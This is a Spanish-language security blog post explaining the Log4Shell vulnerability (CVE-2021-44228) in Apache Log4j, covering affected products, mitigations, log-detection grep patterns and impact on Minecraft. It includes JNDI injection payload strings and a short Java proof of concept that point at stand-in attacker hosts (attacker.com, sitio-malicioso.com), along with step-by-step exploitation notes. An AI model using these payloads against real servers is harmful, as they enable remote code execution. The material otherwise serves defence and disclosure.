Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET
Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1019
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
▼
2021
(Total:
730
)
-
▼
diciembre
(Total:
103
)
-
Tecnología de Intel permite actualizar la BIOS de ...
-
La Universidad de Kioto en Japón pierde 77TB de da...
-
Redline Stealer es un malware que roba las contras...
-
¿Qué es un dropper? (Malware)
-
Fundador de Signal asegura que Telegram es incluso...
-
Diferencias entre el cifrado BitLocker y EFS en Wi...
-
Mejores programas para reparar, recuperar y ver in...
-
TWRP Recovery para teléfonos Android
-
Herramientas para realizar ataques Man‑in‑the‑Midd...
-
Vulnerabilidad en Azure App Service expone reposit...
-
Las 20 mejores herramientas de Hacking de 2021
-
Procesadores Intel 12th Alder Lake para el chipset...
-
Alertan de una importante Campaña Phishing vía SMS...
-
Extensiones Visual Studio Code para programar en ...
-
¿Qué es una APU (CPU + GPU) y un SoC?
-
Crean un algoritmo capaz de adivinar el 41% de las...
-
DuckDuckGo, la alternativa al buscador Google basa...
-
Instalar MacOS Big Sur en una máquina Virtual con ...
-
Editores de imágenes de vídeo gratuitos y de códig...
-
Desinstalar todas las aplicaciones no deseadas que...
-
Reparar tarjeta memoria SD dañada o estropeada
-
Instalar aplicaciones Android en Windows 11: WSATo...
-
Hackean servidores HP con CPUs AMD EPYC para minar...
-
Logrotate: administra los registros (logs) de tu s...
-
Las mejores shells para GNU/Linux
-
Glosario términos en Linux: vocabulario básico
-
Windows 10 versión 21H2 añade protecciones mejorad...
-
Instalar varios sistemas operativos autoarrancable...
-
Vulnerabilidad test de antígenos permite falsifica...
-
Actualización de seguridad importante servidor web...
-
Graves vulnerabilidades plugin SEO instalado en má...
-
Vulnerabilidades Directorio Activo permiten hackea...
-
Ministerio de Defensa de Bélgica es el primer país...
-
La memoria DDR5 es apenas un 3% más rápida que la ...
-
Actualizaciones de Windows 11 solucionan problemas...
-
Disponible distro Hacking WiFi Wifislax de origen ...
-
DuckDuckGo prepara navegador web que protegerá la ...
-
Amazon patenta una red de cámaras que reconcen a p...
-
Los mitos más comunes en ciberseguridad
-
Hospital de Asturias (España) afectado por un ataq...
-
Cable USB llamado BusKill permite borrar automátic...
-
El hackeo con Pegasus para iPhone es uno de los at...
-
Resumen de todas las vulnerabilidades de Log4j
-
Instalación LineageOS en teléfonos Android
-
Gestores de Contraseñas para Android
-
Guía SysAdmin para SELinux
-
Los mejores gestores de contraseñas gratuitos
-
Configurar servidor DLNA para reproducir música y ...
-
Instalar Kali Linux en tu teléfono móvil con NetHu...
-
pfetch, screenfetch o neofetch : mostrar informaci...
-
La estafa del supuesto familiar con la ‘maleta ret...
-
Microsoft y Dell prepararan portátiles más reparables
-
Contenedores en Firefox para mejorar privacidad al...
-
Windows Terminal será la línea de comandos por def...
-
Identificada una segunda vulnerabilidad en Log4j q...
-
Protocolo WebDav permite conectar unidad de red re...
-
Apple publica Tracker Detect para evitar que los u...
-
Volvo Cars informa una brecha de seguridad
-
Consejos de Seguridad para servidores Linux
-
Vulnerabilidad en millones chips de WiFi y Bluetoo...
-
Ataque de ransomware Lapsus al Ministerio de Salud...
-
Configurar una VPN con Wireguard
-
Distribuciones Linux para portátiles antiguos con ...
-
Juegos retro para teléfonos móviles Androd e iPhone
-
Solucionada vulnerabilidad de seguridad de Western...
-
Ladrones de coches están utilizando AirTags de App...
-
Cómo activar la autenticación en dos pasos en Goog...
-
Detenida en España por estafar al Athletic de Bilb...
-
ALPHV BlackCat es el ransomware más sofisticado de...
-
Google permitirá ejecutar juegos de Android en Win...
-
Google y Microsoft trabajan juntos para mejorar el...
-
Vulnerabilidad crítica en Apache Log4j bautizada c...
-
Nueva oferta de Microsoft 365 para los usuarios pi...
-
Nueva versión de Kali Linux 2021.4 que mejora el s...
-
Evitar que tus mails rastreen tus datos personales...
-
Cómo configurar la privacidad y seguridad en Signal
-
Google demanda a 2 rusos responsables de la botnet...
-
Bots se hacen pasar por personal de Twitter para r...
-
Importante vulnerabilidad en Grafana: actualizació...
-
Descubiertos instaladores KMSPico para activar Win...
-
Eltima SDK contiene hasta 27 múltiples vulnerabili...
-
Mozilla publica Firefox 95 con mejoras destacadas ...
-
Cómo migrar CentOS 8 a Rocky Linux 8, AlmaLinux 8 ...
-
Freesync y G-Sync: tecnologías para monitores gami...
-
Ansible permite automatizar tareas en distintos se...
-
Syncthing es una herramienta gratuita multiplatafo...
-
Curiosidades sobre el nuevo CEO de Twitter: 11.000...
-
Filtros en Linux: pipes, tuberías: cut, sort, uniq...
-
El auge del negocio de los ciberataques de denegac...
-
¿Qué son los (IoC) Indicadores de Compromiso?
-
Teléfonos iPhone de empleados del Departamento de ...
-
Mejores sistemas de rescate para recuperar fichero...
-
Ciberataque denegación de servicio distribuido DDo...
-
Hasta 9 routers de marcas muy conocidas acumulan u...
-
Plantillas y archivos RTF de phishing contienen ma...
-
Nvidia reedita la RTX 2060, ahora con 12 GB de RAM...
-
Nueva versión IPFire mejora el rendimiento IPS e i...
-
El perro robótico de Xiaomi usa Ubuntu de sistema ...
-
WiFi 7 tendrá doble de velocidad (hasta 46 Gbps) y...
-
Vulnerabilidad en impresoras HP tras 8 años afecta...
-
- ► septiembre (Total: 56 )
-
▼
diciembre
(Total:
103
)
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Síguenos en:
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d... -
En el panorama en constante evolución de la seguridad de redes, OpnSense se ha convertido en una formidable solución de firewall. Nacido de... -
Pese a que Gemini ofrece multitudes de opciones, recientemente, se ha dado a conocer una situación fuera de lo común. Hace unos días, un es...
Vulnerabilidad crítica en Apache Log4j bautizada como Log4Shell afecta incluso a Minecraft
Una vulnerabilidad zero-day recientemente descubierta en la biblioteca de registro de Java Apache Log4j, ampliamente utilizada (iCloud, Steam, incluso expotable en el chat de Minecraft), es muy fácil de explotar y permite a los atacantes obtener el control total de los servidores afectados. La vulnerabilidad, clasificada como CVE-2021-44228, es muy grave ya que permite la ejecución remota de código sin autenticación cuando el usuario que ejecuta la aplicación utiliza la biblioteca de registro de Java. Afecta Apache Struts2, Apache Solr, Apache Druid, Apache Flink.
Cualquier compañía que en sus servidores o aplicaciones use Apache Log4j, una biblioteca de registro de Java, se está enfrentando a una de las vulnerabilidades más importantes de la última década. Se trata de Log4Shell (CVE-2021-44228), un fallo de seguridad crítico que da como resultado la ejecución remota de código con potencial para tomar el control del equipo. La vulnerabilidad fue descubierta por Chen Zhaojun de Alibaba Cloud Security Team y por su importancia y alcance se compara con Heartbleed y WannaCry.
Log4j 2 es una biblioteca de registro de Java de código abierto desarrollada por Apache Foundation. Log4j 2 se usa ampliamente en muchas aplicaciones y está presente, como dependencia, en muchos servicios. Estos incluyen aplicaciones empresariales, así como numerosos servicios en la nube.
Numerosas apps que utilizan log4j, desde Minecraft hasta Elasticsearch, Zrails, Hadoop, Kafka, Kibana, Solr, Spark, Struts, Tapestry, Wicket...
- Apache Struts
- Apache Solr
- Apache Druid
- Apache Flink
- ElasticSearch
- Flume
- Apache Dubbo
- Logstash
- Kafka
- Spring-Boot-starter-log4j2
CVE-2021-44228 - Log4Shell
Una vulnerabilidad zero-day recientemente descubierta en la biblioteca de registro de Java Apache Log4j, ampliamente utilizada, es fácil de explotar y permite a los atacantes obtener el control total de los servidores afectados. La vulnerabilidad, clasificada como CVE-2021-44228, es muy grave y permite la ejecución remota de código sin autenticación cuando el usuario que ejecuta la aplicación utiliza la biblioteca de registro de Java.
El CERT de Nueva Zelanda advierte que ya está siendo explotada a lo bestia. Una vulnerabilidad de alta gravedad (CVE-2021-44228) que afecta a múltiples versiones de la utilidad Apache Log4j 2 se reveló públicamente a través del GitHub del proyecto el 9 de diciembre de 2021. La vulnerabilidad afecta a las versiones 2.0 a 2.14.1 de Apache Log4j 2.
La vulnerabilidad permite la ejecución remota de código no autenticado. Log4j 2 es una biblioteca de registro de Java de código abierto desarrollada por Apache Foundation. Log4j 2 se usa ampliamente en muchas aplicaciones y está presente, como dependencia, en muchos servicios. Estos incluyen aplicaciones empresariales, así como numerosos servicios en la nube.
Se puede acceder a la vulnerabilidad a través de una multitud de métodos específicos de la aplicación. Efectivamente, cualquier escenario que permita que una conexión remota suministre datos arbitrarios que una aplicación que utiliza la biblioteca Log4j escribe en archivos de registro es susceptible de explotación. Es muy probable que esta vulnerabilidad se explote en la naturaleza y es probable que afecte a miles de organizaciones. Esta vulnerabilidad representa un riesgo real significativo para los sistemas afectados.
Al analizar CVE-2021-44228, Randori ha determinado lo siguiente:
- Instalaciones predeterminadas de software empresarial ampliamente utilizado son vulnerables.
- La vulnerabilidad se puede aprovechar de forma fiable y sin autenticación
- La vulnerabilidad afecta a múltiples versiones de Log4j 2
- La vulnerabilidad permite la ejecución remota de código cuando el usuario ejecuta la aplicación que utiliza la biblioteca
Impacto JNDI - Java Naming and Directory Interface
La biblioteca Log4j 2 se utiliza con mucha frecuencia en el software empresarial Java. Debido a esta metodología de implementación, el impacto es difícil de cuantificar. De manera similar a otras vulnerabilidades de alto perfil, como Heartbleed y Shellshock, creemos que se descubrirán un número cada vez mayor de productos vulnerables en las próximas semanas. Debido a la facilidad de explotación y la amplitud de la aplicabilidad, sospechamos que los actores de ransomware comenzarán a aprovechar esta vulnerabilidad de inmediato.
log4j soporta
- (AFAIK) LDAP
- RMI (Remote Method Invocation)
Exploit:
$(jndi):ldap://sitio-malicioso.com/exp
$(jndi):rdmi://sitio-malicioso.com/exp
¿Cómo funciona la vulnerabilidad?
Diagrama completo:
Recomendaciones - Mitigaciones
Si crees que puedes verte afectado por CVE-2021-44228, revisa los registros de las aplicaciones afectadas en busca de actividad inusual. Si se encuentran anomalías, te recomendamos que asumas que se trata de un incidente activo, que te has visto comprometido y que respondas en consecuencia.
La actualización a las versiones parcheadas de Log4j 2 o las aplicaciones afectadas eliminará esta vulnerabilidad. Randori recomienda a cualquier organización que crea que puede verse afectada que se actualice urgentemente a una versión parcheada.
Si no es posible aplicar parches, se recomienda encarecidamente a las organizaciones que apliquen la mitigación temporal a continuación y supervisen de cerca las aplicaciones afectadas para detectar comportamientos anómalos.
Para mitigar la vulnerabilidad en lugar de actualizar Log4 2j, el siguiente parámetro debe establecerse en verdadero al iniciar la máquina virtual Java:
Para agregar la bandera, los usuarios deben ir a su lanzador, abrir la pestaña de instalaciones, seleccionar la instalación en uso y hacer clic en "..."> "Editar"> "MÁS OPCIONES", y pegar -Dlog4j2.formatMsgNoLookups = true al final de las banderas JVM.
log4j2.formatMsgNoLookups=True
Exploit público (PoC)
package demo;import org.apache.logging.log4j.LogManager;import org.apache.logging.log4j.Logger;public class demo {public static Logger logger= LogManager.getLogger();public static void main(String[] args){System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");logger.error("${jndi:ldap://attacker.com/test}");}}
Para aprovechar inicialmente la vulnerabilidad, un atacante solo necesita proporcionar literalmente la referencia JNDI (el texto que puede ver en el código fuente). Cuando log4j registra esa entrada, analizará el texto, verá la referencia e intentará resolverlo. Y aquí es donde está realmente el problema.
Dependiendo de la referencia JNDI, la biblioteca log4j ahora realizará una consulta LDAP o una consulta RMI a la URL de destino. Aquí es donde un atacante puede usar el paquete marshalsec de Moritz Bechler, disponible en https://github.com/mbechler/marshalsec
Este paquete admite, entre otras cosas, direccionamiento indirecto de referencia JNDI: permite a un atacante configurar un servidor que aceptará la búsqueda JNDI entrante (ya sea LDAP o RMI) y luego creará automáticamente una redirección que apuntará al cliente (en nuestro caso, la biblioteca log4j ) al código base de destino. La biblioteca seguirá la redirección y visitará el servidor de la base de código (al que se accede a través del protocolo HTTP), buscará una clase que se sirva allí y la ejecutará.
La figura siguiente muestra que el paquete marshalsec crea un servidor de direccionamiento indirecto de referencia JNDI usando el protocolo RMI (para usar uno diferente al PoC). Puede ver que un cliente accedió al servidor y fue redirigido a un stub de carga de clases remoto donde la clase final está esperando ser ejecutada
Explicación y ejemplo de la explotación completa:
https://isc.sans.edu/diary/28120
Parche de Apache:
public static List<String> getLocalIps() {
List<String> localIps = new ArrayList<>();
localIps.add("localhost");
localIps.add("127.0.0.1");
Detectar la presencia de Log4j en sistemas (Linux y Windows)
Este script, disponible en GitHub, busca el archivo JndiLookup.class defectuoso en cualquier archivo .jar de su sistema.
Linux
sudo grep -r --include "*.jar" JndiLookup.class /
Windows
findstr /s /i /c:"JndiLookup.class" C:\*.jar
Detectar intentos de explotación de la vulnerabilidad en sus registros (Linux)
Este script, también disponible en el enlace de GitHub anterior, busca intentos de explotación en archivos sin comprimir en el directorio de registros de Linux /var/log y todos sus subdirectorios:
Grep
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
Zgrep
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+
Se han publicado varias herramientas para el análisis de dominios:
¿Quién está afectado? - Jugadores de Minecraft
- Fallo CRÍTICO detectado en Minecraft en TODAS sus versiones hasta la 1.17
- Permite RCE tanto en el servidor como en todos los clientes.
- Se puede explotar con sólo enviar un mensaje en el chat
Versiones vulnerables:
- Todas las versiones de MC Vanilla
- Spigot/Forge
- BungeeCoord
Versiones parcheadas en las últimas horas:
- Paper
- Sponge/Magma
- FlameCord
Muchos, muchos servicios son vulnerables a este exploit. Ya se ha descubierto que los servicios en la nube como Steam, Apple iCloud y aplicaciones como Minecraft son vulnerables.
Cualquiera que use Apache Struts probablemente sea vulnerable. Hemos visto vulnerabilidades similares explotadas antes en brechas como la filtración de datos de Equifax de 2017.
Muchos proyectos de código abierto como el servidor de Minecraft, Paper, ya han comenzado a parchear el uso de log4j.
Actualizaciones (3 horas después de la publicación): según esta publicación de blog (en inglés), las versiones de JDK superiores a 6u211, 7u201, 8u191 y 11.0.1 no se ven afectadas por el vector de ataque LDAP. En estas versiones, com.sun.jndi.ldap.object.trustURLCodebase se establece en falso, lo que significa que JNDI no puede cargar una base de código remota utilizando LDAP.
Sin embargo, existen otros vectores de ataque dirigidos a esta vulnerabilidad que pueden resultar en RCE. Dependiendo del código que esté presente en el servidor, un atacante podría aprovechar este código existente para ejecutar una carga útil. En esta publicación de blog se analiza un ataque dirigido a la clase org.apache.naming.factory.BeanFactory, presente en los servidores Apache Tomcat.
Versiones de Apache log4j afectadas
2.0 <= Apache log4j <= 2.14.1
Ejemplo Código vulnerable
import org.apache.log4j.Logger;import java.io.*;import java.sql.SQLException;import java.util.*;public class VulnerableLog4jExampleHandler implements HttpHandler {static Logger log = Logger.getLogger(log4jExample.class.getName());/*** A simple HTTP endpoint that reads the request's User Agent and logs it back.* This is basically pseudo-code to explain the vulnerability, and not a full example.* @param he HTTP Request Object*/public void handle(HttpExchange he) throws IOException {string userAgent = he.getRequestHeader("user-agent");// This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.// The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}log.info("Request User Agent:" + userAgent);String response = "<h1>Hello There, " + userAgent + "!</h1>";he.sendResponseHeaders(200, response.length());OutputStream os = he.getResponseBody();os.write(response.getBytes());os.close();}}
Pasos de explotación
- Los datos del usuario se envían al servidor (a través de cualquier protocolo),
- El servidor registra los datos en la solicitud, que contienen la carga útil maliciosa: $ {jndi: ldap: //attacker.com/a} (donde attacker.com es un servidor controlado por el atacante),
- La vulnerabilidad log4j es provocada por esta carga útil y el servidor realiza una solicitud a attacker.com a través de "Java Naming and Directory Interface" (JNDI),
- Esta respuesta contiene una ruta a un archivo de clase Java remoto (por ejemplo, http://second-stage.attacker.com/Exploit.class) que se inyecta en el proceso del servidor,
- Esta carga útil inyectada desencadena una segunda etapa y permite que un atacante ejecute código arbitrario
Detección del ataque e IOCs
Florian Roth (aka
cyb3rops) creó un
repositorio
con algunas opciones para la detección y la mitigación así como las
reglas de YARA correspondientes. Estos comandos buscan distintos
intentos de explotación en /var/log:
# sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log# sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i'\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+'# sudo find /var/log/test/ -type f -exec sh -c "cat {} |sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'"\;# sudo find /var/log/test/ -name "*.gz" -type f -exec sh -c "zcat {} |sed -e 's/\${lower://'g | tr -d '}' | egrep -i 'jndi:(ldap[s]?|rmi|dns):'" \;
Se han publicado las reglas de Suricata y Snort y un plugin para Burp.
Ya se ha iniciado la explotación masiva de esta vulnerabilidad principalmente por operadores de malware para el criptominado. GreyNoise ha publicado un listado de IPs, IOCs y Hashes de atacantes, las que corresponden principalmente a nodos de salida TOR.
Fuentes:
Etiquetas:
Entrada más reciente
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.